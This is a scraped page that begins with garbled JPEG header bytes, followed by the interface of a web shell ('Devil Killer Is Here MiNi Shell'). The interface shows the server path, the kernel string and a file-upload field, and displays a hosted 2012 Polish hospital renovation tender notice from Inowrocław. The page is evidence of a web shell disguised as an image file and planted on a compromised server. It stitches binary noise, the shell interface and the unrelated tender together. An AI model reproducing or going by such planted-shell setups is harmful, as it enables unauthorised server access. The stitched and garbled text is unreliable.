JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120601/183618-N-2012.html

<p class="kh_header"><b>Inowrocław: Przetarg nieograniczony nr M-35/2012 na Roboty budowlane pn. Remont w Oddziale Rehabilitacyjnym (parter) dla potrzeb Oddziału Ortopedii i Rehabilitacji oraz w Oddziale Ortopedii (III piętro)  na potrzeby Oddziału Kardiologii i Rehabilitacji w PSZOZ w Inowrocławiu</b><br>
<b>Numer ogłoszenia: 183618 - 2012; data zamieszczenia: 01.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczny Specjalistyczny Zakład Opieki Zdrowotnej , ul. Poznańska 97, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 052 3545587, faks 052 3574667.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pszozino.lo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony nr M-35/2012 na Roboty budowlane pn. Remont w Oddziale Rehabilitacyjnym (parter) dla potrzeb Oddziału Ortopedii i Rehabilitacji oraz w Oddziale Ortopedii (III piętro)  na potrzeby Oddziału Kardiologii i Rehabilitacji w PSZOZ w Inowrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest  wykonanie remontu   w oddziale rehabilitacyjnym(parter) dla potrzeb oddziału ortopedii i rehabilitacji oraz w oddziale ortopedii (III piętro)na potrzeby oddziału kardiologii i rehabilitacji  PS ZOZ w Inowrocławiu. 
2.	Szczegółowy zakres prac określają: opisy techniczne, przedmiary robót oraz specyfikacje techniczna wykonania i odbioru robót dot. poszczególnych oddziałów,  które  stanowią załączniki Nr  7 - 14 do niniejszej specyfikacji. 
3.	Zamawiający wymaga, aby Wykonawca udzielił na przedmiot zamówienia  dwuletniej gwarancji jakości na elementy wykończeniowe, licząc od dnia odbioru końcowego i przekazania przedmiotu zamówienia do użytkowania. 
4.	Wykonanie robót:
      4.1 Wszystkie prace należy wykonać zgodnie ze szkicami technicznymi  , 
             specyfikacją techniczną, przedmiarem robót, SIWZ,  obowiązującymi normami i 
             sztuką budowlaną. 
     
     4.2   Prace, które będą powodowały zadymienie należy każdorazowo uzgadniać z
	       inspektorem ds.ochrony pożarowej.
	 4.3   Przed przystąpieniem do prac osoby Wykonawcy, biorące udział w tych pracach
	       muszą zostać przeszkolone przez służby BHPiP-POŻ PSZOZ w Inowrocławiu.
    4.4  Miejsce wykonywania prac musi być zabezpieczone i oznakowane 
    4.5  Wykonawca będzie mógł korzystać ze źródeł poboru energii elektrycznej i wody.
           nieodpłatnie 
    4.6 Prace mogą być wykonywane w każdy dzień tygodnia od 7.00 do 18.00.Prace
          powodujące hałas mogą być wykonywane w dni robocze w godzinach od 10.00 do 
         18.00.
    4.7 Należy systematycznie utrzymywać porządek na terenie prowadzenia robót , 
      składować materiały i sprzęt w należytym porządku i  w wyznaczonym miejscu, 
      a po zakończeniu prac uporządkować teren . 
    4.8 Wykonawca będzie wykonywał prace w sposób najmniej utrudniający 
      użytkownikowi korzystanie z obiektów w trakcie prac. 
    5.     Warunki wykonania przedmiotu Zamówienia.
    5.1   Zamawiający dopuszcza możliwość wykonania przedmiotu zamówienia przez
            wykonawcę przy pomocy podwykonawcy/ów.
    5.2   Przed zawarciem umów z podwykonawcą/ami Wykonawca zobowiązuje się do 
            udzielenia wszelkich informacji Zamawiającemu dotyczących  
            podwykonawcy/ów.
    5.3  Wykonawca zobowiązany jest określić  w ofercie tą część przedmiotu 
           zamówienia, której wykonanie zamierza powierzyć podwykonawcom.
    5.4  Wykonawca jest odpowiedzialny wobec Zamawiającego za działania bądź 
            zaniechania podwykonawcy jak za własne działania bądź zaniechania.
    5.5  Wykonawca w celu bieżącego finansowania robót musi dysponować aktywami 
            płynnymi i kredytami  potwierdzonymi przez bank, po odjęciu innych
            zobowiązań  kontraktowych oraz wszelkiego rodzaju zaliczek, które mogą być 
            wypłacone w ramach kontraktu, w wysokości łącznej co najmniej 80.000,00 
            zł (słownie: osiemdziesiąt tysięcy złotych 00/100)
     6.    Warunki rozliczenia robót będących przedmiotem zamówienia:
      Należność za wykonany zakres zadania regulowana  na podstawie 
faktury, płatna będzie w terminie 30 dni od daty przedłożenia faktury. Zamawiający dopuszcza faktury okresowe jednak zakresy i związane z nimi wartości faktur należy uzgodnić przed podpisaniem umowy z Zamawiającym.
7.  W pozycjach, w których opis przedmiotu zamówienia zawiera nazwę, można   
  stosować przedmioty równoważne, które odpowiadają tym samym normom i  
  spełniają te same zadania funkcjonalno - użytkowe co przedmioty wymienione w 
  opisie. Wykazanie równoważności zaoferowanego przedmiotu spoczywa na 
  Wykonawcy.
8.	  Zamawiający zaleca Wykonawcom przeprowadzenie szczegółowej wizji lokalnej
        miejsca wykonywanych prac celem uzyskania wszystkich informacji koniecznych
        do przygotowania oferty i zawarcia umowy. Każdy z Wykonawców ponosi pełną 
        odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji 
        zamówienia i stanu miejsca wykonywanych prac.
   8.1   Zamawiający ustala  termin wizji lokalnej na dzień 05.06.2012r. godz.  11.00
   8.2.  Prosimy o wcześniejsze zgłoszenie przybycia pod nr telefonu (052) 35 45 325, lub
           na nr faksu (052) 357-94-15.
   8.3.  Na wizję lokalną należy zgłosić się do: Publicznego Specjalistycznego Zakładu 
           Opieki Zdrowotnej w Inowrocławiu, ul. Poznańska 97,  Sekretariat  Głównego 
           Specjalisty ds. techniczno - administracyjnych .
   8.4.  W przypadku braku możliwości uczestnictwa w wizji w dniu wyznaczonym przez 
           Zamawiającego istnieje możliwość uzgodnienia z Zamawiającym dodatkowego 
           terminu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, iż przewiduje możliwość udzielania zamówień
uzupełniających, o których mowa w art.67 ust. 1 pkt.6 ustawy Pzp ,zgodnie z art.36 ust.2 pkt.3 ustawy Pzp dla przedmiotu zamówienia opisanego w SIWZ lub wybranych rodzajów robót budowlanych z zamówienia podstawowego. Zamówienie uzupełniające może być udzielone na kwotę nie większą niż 50%kwoty wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.25.00-6, 45.41.00.00-4, 45.43.21.00-5, 45.44.21.00-8, 45.43.10.00-7, 45.33.00.00-0, 45.42.11.46-9, 45.33.22.00-5, 45.31.12.00-2, 45.45.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 53.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.   Wadium należy wnosić w kwocie :  10.000,00 zł
           (słownie: dziesięć tysięcy złotych 00/100 )
2.	Miejsce wnoszenia wadium w pieniądzu na wskazany rachunek bankowy:

                  - Bank :  Kredyt Bank  S.A. O/Bydgoszcz
                    Nr rachunku: 88 1500 1360 1213 6002 4430 0000 

    3. Wadium wnoszone w pieniądzu można wpłacać przelewem na wskazane konto.
    4. Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć 
        do  oferty.  
       5.Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji 
           ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju,
           Przedsiębiorczości, należy dołączyć do oferty w formie nienaruszonego oryginału lub  
           zdeponować w kasie u Zamawiającego, a kopię załączyć do oferty.
      6.   Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób
            reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego 
            (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w
            sposób  umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub
            czytelny  (z podaniem imienia i nazwiska).
            Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie
            zgłoszone przez zamawiającego w terminie związania ofertą,  zobowiązanie gwaranta
            do wypłaty  zamawiającemu pełnej kwoty wadium w okolicznościach określonych w 
            art. 46 ust. 5  ustawy Prawo zamówień publicznych. 
 7.  Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert 
      tj. do dnia  15.06.2012r. godz. 9:30
    8.  Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną  formą
          wadium w wyznaczonym terminie zostanie wykluczony z postępowania.
    9.   Dyspozycję w zakresie zwrotu wniesionych w pieniądzu wadiów wykonawców,
 Zamawiający przekaże do banku niezwłocznie po:

a)	wyborze najkorzystniejszej oferty, unieważnieniu postępowania o udzielenie
 niniejszego zamówienia    publicznego, za wyjątkiem Wykonawcy  , którego oferta została uznana za najkorzystniejszą -z zastrzeżeniem art. 46  ust. 4 a ustawy Pzp. oraz   niezwłocznie  na  wniosek Wykonawcy , który wycofał ofertę przed upływem  terminu   spływania ofert. 
 b)  zawarciu umowy w sprawie zamówienia publicznego.

10.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi 
 na wezwanie, o którym mowa w art. 26 ust. 3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni , że wynika to z przyczyn nie leżących  po jego stronie.
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego   oferta 
      zostanie wybrana:
 a) odmówi podpisania umowy  na warunkach określonych w ofercie,
 b) zawarcie umowy  w sprawie zamówienia publicznego stanie się niemożliwe z     przyczyn
     leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia określonego w części III SIWZ ubiegać się wykonawcy
           którzy: 
a)	nie podlegają wykluczeniu na podstawie przepisów art. 24 ust. 1 i 2 ustawy   
     Pzp spełniają warunki określone przepisami art. 22 ust. 1 pkt 1-4 ustawy Pzp,
b)	zrealizowali w okresie ostatnich 5 lat przed upływem terminu składania ofert , a  jeżeli
    okres  prowadzenia działalności jest krótszy - w tym okresie przynajmniej  dwie 
    roboty remontowo-budowlane odpowiadające rodzajem  przedmiotowi  zamówienia, o 
    wartości robót co najmniej  200.000,00 zł każda (słownie: dwieście tysięcy 
    złotych 00/100) w tym jedna zrealizowana w Publicznej Służbie Zdrowia.
c)	dysponują przy realizacji zamówienia pracownikami i kadrą inżynieryjno techniczną, przewidzianą do realizacji zamówienia wraz z uprawnieniami. Minimum 25 pracowników zatrudnionych na stałe(potwierdzonymi drukami ZUS RMUA lub drukami DRA z miesiąca poprzedniego)
d)	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności
     na sumę minimum 500 000,00 zł  (słownie: pięćset  tysięcy złotych 00/100), 
e)	dysponują  aktywami płynnymi i kredytami potwierdzonymi przez bank, po odjęciu innych zobowiązań kontraktowych oraz wszelkiego rodzaju zaliczek, które mogą być wypłacone w ramach kontraktu, w wysokości łącznej co najmniej 80.000,00 zł (słownie: osiemdziesiąt tysięcy złotych  00/100).

     Zamawiający   dokona oceny spełniania warunków na podstawie dokumentów
     dołączonych celem ich wykazania wymienionych w pkt. 9.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zrealizowali w okresie ostatnich pięciu lat przed upływem terminu    składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  przynajmniej dwóch robót remontowo-budowlanych, odpowiadających swoim rodzajem i wartością robotom remontowo-budowlanym, stanowiącym przedmiot zamówienia, o wartości robót co najmniej 200.000,00 zł każda,(słownie dwieście tysięcy złotych  00/100) w tym jedna zrealizowana w Publicznej Służbie Zdrowia   z podaniem ich wartości,  przedmiotu, dat wykonania i odbiorców wraz z dokumentami potwierdzającymi, że roboty objęte wykazem, o którym  mowa wyżej, zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz pracowników i kadry inżynieryjno technicznej, przewidzianych do realizacji zamówienia wraz z uprawnieniami.  Minimum 25 pracowników zatrudnionych na stałe (potwierdzonymi drukami ZUS RMUA lub DRA z miesiąca poprzedniego)   (wg załącznika nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz pracowników i kadry inżynieryjno technicznej, przewidzianych do realizacji zamówienia wraz z uprawnieniami.  Minimum 25 pracowników zatrudnionych na stałe (potwierdzonymi drukami ZUS RMUA lub DRA z miesiąca poprzedniego)   (wg załącznika nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zaświadczenie z banku  o dysponowaniu  aktywami płynnymi i kredytami  potwierdzonymi przez bank, po odjęciu innych zobowiązań kontraktowych oraz wszelkiego rodzaju zaliczek, które mogą być wypłacone w ramach kontraktu, w wysokości łącznej co najmniej 80.000,00 zł (słownie osiemdziesiąt  tysięcy złotych 00/100),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia na kwotę minimum 500.000,00 zł (słownie pięćset tysięcy złotych 00/100).

a)	wypełniony formularz  -Oferta (zał. nr 1),
b)	kosztorys szczegółowy,
         c) dowód wniesienia wadium,
         d) dokument z którego wynika uprawnienie do podpisania oferty lub pełnomocnictwo  do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie wpisu z rejestru handlowego lub zaświadczenia o prowadzeniu działalności gospodarczej. Jeżeli pełnomocnictwo nie ma postaci aktu notarialnego powinno zawierać pieczęć Wykonawcy, imienną pieczątkę wystawiającego pełnomocnictwo i jego podpis, 
        e) opis części zamówienia, która zostanie powierzona podwykonawcy (jeżeli dotyczy), 
        f) w przypadku  gdy Wykonawca będzie polegać na wiedzy, doświadczeniu innych
            podmiotów przedstawi w tym celu  pisemne zobowiązanie tych podmiotów do 
           oddania   mu   do dyspozycji  niezbędnych zasobów na okres korzystania  z nich przy 
           wykonywaniu  zamówienia,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin wykonania zamówienia (w dniach) - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Istotne postanowienia umowy określa wzór umowy stanowiący załącznik nr 6 do   niniejszej  Specyfikacji. 
                2. Poza przypadkami określonymi w umowie zmiany umowy będą mogły wystąpić  w  następujących okolicznościach:
                a) zaistnienia , po zawarciu umowy przypadku siły wyższej , przez którą na
                    potrzeby niniejszego warunku , rozumieć należy zdarzenie zewnętrzne wobec 
                    łączącej strony więzi    prawnej:
